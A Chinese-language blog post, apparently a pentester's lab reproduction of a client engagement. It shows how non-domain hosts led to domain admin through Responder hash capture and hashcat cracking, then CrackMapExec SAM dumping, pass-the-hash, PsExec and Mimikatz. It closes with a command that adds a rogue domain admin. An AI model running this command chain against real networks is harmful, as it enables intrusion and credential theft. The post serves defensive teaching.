如何從活動目錄域外的機器拿到域控許可權

這是在我博客中第一篇非web類的文章，我是一個傳統的web開發人員，web安全是從事安全方面的出發點。但是從我進入滲透測試行業開始，我就被這個行業深深吸引，從兼職一步步做到了全職的滲透測試工程師，活動目錄域是我最喜歡的滲透測試類型。

這篇文章是關於我在今年早些為客戶做的內部滲透測試，因為之前已經測試過，了解到這個客戶的網路環境相當複雜，所以開始的時候很忐忑會測試不成功。

我在內網中做的第一件事就是運行Responder工具，會從本地網路中的LLMNR或者NETBIOS請求中獲取到Windows hash。但是客戶還是比較有安全意識的，他們已經禁用了LLMNR以及NetBIOS請求。儘管在之前的測試中已經了解到了這一點，但是我還是抱有一份希望，因為在OSCP課程中學到了總要先從嘗試簡單的方法開始，如果門開著，你從天窗進去那豈不是多此一舉。

於是我執行了Responder，我竟然捕捉到了一台機器的hash！

當然，我肯定不會在博客中公開客戶的私密信息，因此你看到所有內容都是我在實驗室內重新搭建環境復現出來的，並且一些隱私信息已經隱藏。

上圖中可以看到172.16.157.133這一主機給我們呈現出了FRONTDESK用戶的NETNTLMv2 hash。使用Crack Map Exec檢查NetBIOS信息，進而確定這是不是本地用戶的hash，用戶名的域部分為：

[SMBv2] NTLMv2-SSP Username : 2-FD-87622FRONTDESK

即2-FD-87622應與主機的NetBIOS名稱匹配（如果是這種情況）。使用CME查找IP，我們可以看到主機的名稱匹配.

所以我們下一步要做的就是嘗試破解這一hash，然後得到這一用戶的明文密碼。使用hashcat進行破解，很快出了結果：

現在我們已經獲得了前台機器的登陸憑證，現在使用這一憑證進行攻擊這台機器：

cme smb 172.16.157.133 -u FRONTDESK -p "Winter2018!" --local-auth

上圖中可以看到」Pwn3d」已經輸出，這就意味著我們已經獲取到了本地的管理員賬戶。這就意味著我們已經有了獲取本地用戶hash的許可權：

cme smb 172.16.157.133 -u FRONTDESK -p "Winter2018!" --local-auth --sam

可以看到已經得到了本地用戶的hash：

FRONTDESK:1002:aad3b435b51404eeaad3b435b51404ee:eb6538aa406cfad09403d3bb1f94785f:::

這次我們看到的密碼的是NTLM hash值，而不是之前Responder獲取的NETNTLMv2 「挑戰/響應」hash。Responder通過網路流量捕獲hash和windows存儲在SAM中的hash是不同的。

下一步就是使用這一管理員的散列對客戶的主機進行「哈希傳遞攻擊」，而不是對這一hash進行破解。

cme smb 172.16.157.0/24 -u administrator -H "aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51" --local-auth

我們只能使用存儲的NTLM哈希進行傳遞，而不是使用NETNTLMv2格式的hash。

令我們比較驚訝的是，本地管理員賬戶在STEWIE機器上登錄上去了。查詢這一主機的BIOS信息：

$ cme smb 172.16.157.134

SMB 172.16.157.134 445 STEWIE

[*] Windows Server 2008 R2 Foundation 7600 x64 (name:STEWIE) (domain:MACFARLANE)

(signing:False) (SMBv1:True)

我們可以看到這台機器是MACFARLANE域中的一員，而且這一個域是客戶的主域。

所以我們通過一個本地無域機器的管理員密碼進入到域內一個機器。現在使用Metasploit中的PsExec登陸這台機器，將NTLM哈希作為密碼填寫上去：

一旦執行，我們就會得到shell：

然後使用Mimikatz模塊從windows內存中獲取密碼：

上圖中我們已經得到了域管理員的密碼，最後，我們使用CME在域控制器上執行命令，將自己添加為一個域管理員。

cme smb 172.16.157.135 -u administrator -p "October17" -

x "net user markitzeroda hackersPassword! /add /domain /y && net group "domain admins" markitzeroda

/add"

注意/y參數的含義是讓windows允許你添加超過14個字元的密碼。

遠程桌面到域控制器的屏幕截圖可以作為利用證據寫入到報告中：

因此如果第一台拿下的機器加入到域中，那麼它將會禁用掉LLMNR通信，並且我們不會獲得hash值，然後這次滲透測試就不會成功～這就是文章開始的問題，為什麼所有的機器要加入域中的答案。

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！